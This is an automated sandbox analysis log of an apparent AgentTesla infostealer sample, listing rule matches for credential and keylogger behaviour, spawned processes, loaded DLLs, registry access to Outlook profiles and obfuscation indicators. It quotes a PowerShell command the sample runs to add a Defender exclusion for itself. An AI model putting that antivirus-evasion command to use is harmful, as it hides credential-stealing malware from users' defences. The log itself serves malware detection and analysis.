                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: hesaphareketi__20241001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, GxasrEb6btbl4ZlyPy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, GxasrEb6btbl4ZlyPy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, GxasrEb6btbl4ZlyPy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@1/1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi__20241001.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hty4xym.goh.ps1Jump to behavior
                  Source: hesaphareketi__20241001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: hesaphareketi__20241001.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: hesaphareketi__20241001.exeReversingLabs: Detection: 75%
                  Source: hesaphareketi__20241001.exeVirustotal: Detection: 27%
                  Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: hesaphareketi__20241001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: hesaphareketi__20241001.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: hesaphareketi__20241001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: Xk.pdbSHA256 source: hesaphareketi__20241001.exe
                  Source: Binary string: Xk.pdb source: hesaphareketi__20241001.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: hesaphareketi__20241001.exe, frmListContacts.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.cs.Net Code: bS50r79wDG System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.40aa230.1.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.40c2450.3.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.7890000.5.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.cs.Net Code: bS50r79wDG System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.cs.Net Code: bS50r79wDG System.Reflection.Assembly.Load(byte[])
                  Source: hesaphareketi__20241001.exeStatic PE information: 0xF298BC3E [Mon Dec 22 14:12:14 2098 UTC]
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_015DF112 pushad ; iretd 0_2_015DF119
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055DCE50 push eax; ret 0_2_055DF4E1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055DFDC0 push eax; mov dword ptr [esp], ecx0_2_055DFDD4
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07577C80 pushad ; ret 0_2_07577C81
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A3A14D push FFFFFF8Bh; iretd 0_2_07A3A14F
                  Source: hesaphareketi__20241001.exeStatic PE information: section name: .text entropy: 7.728445191379543
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, oM3yqP0pdOqJtt0hwo.csHigh entropy of concatenated method names: 'Gdv6YxasrE', 'bbt6jbl4Zl', 'ahb6VN4WJe', 'GrB6lNbeAf', 'qUV6922YSR', 'wYt6cBwkQC', 'gamWHa5xZQiT4hOarQ', 'okWpYddVd96LG4v2S1', 'iaW9tS6kBOO8bOXSOd', 'IsE66JAq8f'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, jxtK5RFj1Y2g2eJ6Jh.csHigh entropy of concatenated method names: 'IO6N618GSK', 'C0ZNS3cnN5', 'IIMN08VWhk', 'VeJNybVTRi', 'Tb0N8YFRUg', 'BTbNAv1Tbe', 'TsONsK3l3g', 'ywxiGAoq1y', 'pu1iBtwN9s', 'spjiRLZvqZ'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, xxMJ9R6aIbQ1FxVAIOn.csHigh entropy of concatenated method names: 'C27Ne3d7Ve', 'w91NMaPoBf', 'pFmNrjkkN7', 'xL3NUMi86Q', 'oyQNm1Uf3g', 'k7yNIn1ciE', 'mnPNoRCClQ', 'XKJNbTX1pZ', 'BbWNTi85cE', 'EbtNDahjaI'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, yvnqjZuT3Mj4EaRnjM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F4HpR82jn4', 'zJcpFsKgvf', 'M59pz0KFTX', 'wWOSaMMrwK', 'jTsS6cIxdH', 'SQ1Sp5fZgu', 'endSSjp6XL', 'tiDy9xyeQbAnAum0njx'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, rQMVFf4JGsgCQU071W.csHigh entropy of concatenated method names: 'v8WEbTYsD3', 'cxOETM3Kke', 'VbMEvOWJPQ', 'vWeEtidKZC', 'vV5E27yd4A', 'FimEQW2XG8', 'F76E1s2xpM', 'A6JEJx1YqO', 'NxAEfHrmE4', 'zRIEdDmtvY'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, j2A3akwxX8ZEUCuPhW.csHigh entropy of concatenated method names: 'AvLhB5oiZ5', 'NbchFoshMe', 'peiiacQI6a', 'domi6oqhlp', 'PmlhdYJwnQ', 'HQLhLvjj3y', 'su1h4c8BAU', 'xEEh3sBWI4', 'j5phOaqt2i', 'LbQh7FMMcl'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, lXcL7hR8MPuGRUdffj.csHigh entropy of concatenated method names: 's9BivdlkwL', 'GgRitCkbmb', 'XZOiHqBnXQ', 'RXyi2Ey2MV', 'LA6i3Yh0uU', 'lqJiQq0qX8', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, yrtDJ8zlG303A4dPlO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ALVNEC8gOQ', 'XRwN9Z43Yw', 'NmUNc9563O', 'y2nNhORViA', 'CH4NiPScgb', 'YeLNNWbrY5', 'Fc1NnonUSd'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, GxasrEb6btbl4ZlyPy.csHigh entropy of concatenated method names: 'EuP83RttDC', 'MKI8OaIgR1', 'f9387Z1ELR', 'GQe8qlEtGP', 'Wew8xtix22', 'CWn8wlsGcM', 'sD28GtnWVw', 'o5l8BXCGhr', 'daJ8R0VtlF', 'dxa8FXgBo6'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, QcccKvBOIqNEDDbfSO.csHigh entropy of concatenated method names: 'CB1iydUHER', 'z1yi8qtpG4', 'PpCiuGPYUX', 'DTriACk9Fs', 'YLFisWLROX', 'EbKiY0F5uY', 'KlSijg1RtP', 'HupiC7LRfb', 'IIQiV8JTIg', 'HWPilGcqGd'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, kMIvxVgMnZ8X3ijAoI.csHigh entropy of concatenated method names: 'UW2YeUJBcb', 'VVAYMCNJqi', 'M6HYrjydNa', 'FWNYU1iLD4', 'yWAYmU0HDU', 'WwmYIFfr3w', 'GNcYocupWU', 'y7QYbpj7J6', 'BUqYT8JqmW', 'CBsYDZVKcB'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, xCkofu1qgWKeqdhGVy.csHigh entropy of concatenated method names: 'FYoYy9Lj8n', 'o5dYuNKuhd', 'j3hYskXoN7', 'cZ3sFSCSWD', 'dWiszAQM0N', 'fVvYaXfKv2', 'vHoY67CsLQ', 'bJUYpsnYeQ', 'myBYSA3ldu', 'C8fY0C9D0Y'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, vZ1DdYpttd7fpYi8k2.csHigh entropy of concatenated method names: 'gWgrPBkwy', 'XPlUwRVLq', 'AtbITuMj9', 'imvot8Ti7', 'KhfTwQMyI', 'EC0DIYwt1', 'q3TdwSbKKiiS2sSNZ9', 'HR3QW94b2cVrXsghQt', 'wfZiEGYkZ', 'WI3nC8aZQ'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, qZS5oaThbN4WJevrBN.csHigh entropy of concatenated method names: 'PsKuUGcJGs', 'Tm7uI8PeTJ', 'Nhiublk2KA', 'kavuT2wbD1', 'neiu9bcYjN', 'JOIuchXU8h', 'KH9uhYyRDK', 'J6IuisQo9a', 'm8cuNJHmfC', 'iBpunZxOEY'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csHigh entropy of concatenated method names: 'EDvSKvsv6N', 'BSYSypaGai', 'Od4S8VDUgi', 'b9RSujQt9T', 'fOmSAf4kJ1', 'VvPSsiVrfU', 'rjKSY1qNgU', 'IPbSjg1ys3', 'DR8SCoH2v3', 'tQ6SVwo9ep'
